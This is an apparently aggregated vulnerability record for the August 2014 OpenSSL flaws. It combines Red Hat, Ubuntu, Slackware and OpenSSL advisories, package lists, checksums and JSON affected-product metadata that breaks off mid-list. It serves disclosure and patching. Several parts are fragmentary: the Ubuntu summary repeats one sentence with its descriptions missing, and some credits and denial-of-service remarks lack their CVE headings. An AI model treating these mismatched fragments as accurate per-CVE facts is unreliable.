s390x: openssl-debuginfo-1.0.1e-16.el6_5.15.s390x.rpm openssl-perl-1.0.1e-16.el6_5.15.s390x.rpm openssl-static-1.0.1e-16.el6_5.15.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-static-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm
x86_64: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-perl-1.0.1e-16.el6_5.15.i686.rpm openssl-static-1.0.1e-16.el6_5.15.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-static-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-34.el7_0.4.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.4.i686.rpm openssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.4.i686.rpm openssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-static-1.0.1e-34.el7_0.4.i686.rpm openssl-static-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-34.el7_0.4.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.4.i686.rpm openssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.4.i686.rpm openssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-static-1.0.1e-34.el7_0.4.i686.rpm openssl-static-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-34.el7_0.4.src.rpm
ppc64: openssl-1.0.1e-34.el7_0.4.ppc64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.ppc64.rpm openssl-devel-1.0.1e-34.el7_0.4.ppc.rpm openssl-devel-1.0.1e-34.el7_0.4.ppc64.rpm openssl-libs-1.0.1e-34.el7_0.4.ppc.rpm openssl-libs-1.0.1e-34.el7_0.4.ppc64.rpm
s390x: openssl-1.0.1e-34.el7_0.4.s390x.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.s390x.rpm openssl-devel-1.0.1e-34.el7_0.4.s390.rpm openssl-devel-1.0.1e-34.el7_0.4.s390x.rpm openssl-libs-1.0.1e-34.el7_0.4.s390.rpm openssl-libs-1.0.1e-34.el7_0.4.s390x.rpm
x86_64: openssl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.4.i686.rpm openssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.4.i686.rpm openssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-34.el7_0.4.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.ppc64.rpm openssl-perl-1.0.1e-34.el7_0.4.ppc64.rpm openssl-static-1.0.1e-34.el7_0.4.ppc.rpm openssl-static-1.0.1e-34.el7_0.4.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-34.el7_0.4.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.s390x.rpm openssl-perl-1.0.1e-34.el7_0.4.s390x.rpm openssl-static-1.0.1e-34.el7_0.4.s390.rpm openssl-static-1.0.1e-34.el7_0.4.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-static-1.0.1e-34.el7_0.4.i686.rpm openssl-static-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-34.el7_0.4.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.4.i686.rpm openssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.4.i686.rpm openssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-static-1.0.1e-34.el7_0.4.i686.rpm openssl-static-1.0.1e-34.el7_0.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-3505.html https://www.redhat.com/security/data/cve/CVE-2014-3506.html https://www.redhat.com/security/data/cve/CVE-2014-3507.html https://www.redhat.com/security/data/cve/CVE-2014-3508.html https://www.redhat.com/security/data/cve/CVE-2014-3509.html https://www.redhat.com/security/data/cve/CVE-2014-3510.html https://www.redhat.com/security/data/cve/CVE-2014-3511.html https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv_20140806.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFT69raXlSAg2UNWIIRAiQAAKCbp6Iou4mHuootBfgs0jm7zP/wWACgt50C pHXxupQnHYYH+zJFOmk5u8o= =DwUW -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ============================================================================ Ubuntu Security Notice USN-2308-1 August 07, 2014
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. When OpenSSL is used with certain applications, an attacker may use this issue to possibly gain access to sensitive information. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-5139)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.5
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.17
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.20
After a standard system update you need to reboot your computer to make all the necessary changes. Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library. Solution:
The References section of this erratum contains a download link (you must log in to download the update).
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz 3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: 3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz 075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz 92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: df5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz 582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz b80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: 9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz 0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Slackware 14.0 packages: d1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz ec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz 25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz 4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: f2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz 4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Slackware -current packages: 49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz 27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz
Slackware x86_64 -current packages: 8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz fd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. OpenSSL Security Advisory [6 Aug 2014] ========================================
Information leak in pretty printing functions (CVE-2014-3508)
A flaw in OBJ_obj2txt may cause pretty printing functions such as X509_name_oneline, X509_name_print_ex et al. to leak some information from the stack. Applications may be affected if they echo pretty printing output to the attacker. OpenSSL SSL/TLS clients and servers themselves are not affected.
Thanks to Ivan Fratric (Google) for discovering this issue. This issue was reported to OpenSSL on 19th June 2014.
The fix was developed by Emilia Käsper and Stephen Henson of the OpenSSL development team. This can be exploited through a Denial of Service attack.
OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Joonas Kuorilehto and Riku Hietamäki (Codenomicon) for discovering and researching this issue. This issue was reported to OpenSSL on 2nd July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
OpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this issue. This issue was reported to OpenSSL on 8th July 2014.
The fix was developed by Gabor Tyukasz. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley and Wan-Teh Chang (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)
OpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a denial of service attack. A malicious server can crash the client with a null pointer dereference (read) by specifying an anonymous (EC)DH ciphersuite and sending carefully crafted handshake messages.
OpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i.
Thanks to Felix Gröbert (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 18th July 2014.
The fix was developed by Emilia Käsper of the OpenSSL development team.
OpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i.
Thanks to David Benjamin and Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 21st July 2014.
The fix was developed by David Benjamin.
SRP buffer overrun (CVE-2014-3512)
A malicious client or server can send invalid SRP parameters and overrun an internal buffer. Only applications which are explicitly set up for SRP use are affected.
Thanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC Group) for discovering this issue. This issue was reported to OpenSSL on 31st July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20140806.txt
Note: the online version of the advisory may be updated with additional details over time
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201408-0094", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8u" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8v" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8x" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8y" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8za" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8w" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "79700" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78550" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78450" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78350" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78300" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75560" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75450" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75350" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75300" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75250" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "72250" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "72200" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "66550" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "58750" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "58550" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "58450" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57550" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57450" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57400" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57350" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "36550" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "93030" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "93020" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "93010" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "89000" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "87000" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "storage server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "jboss web server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1.0" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.3" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 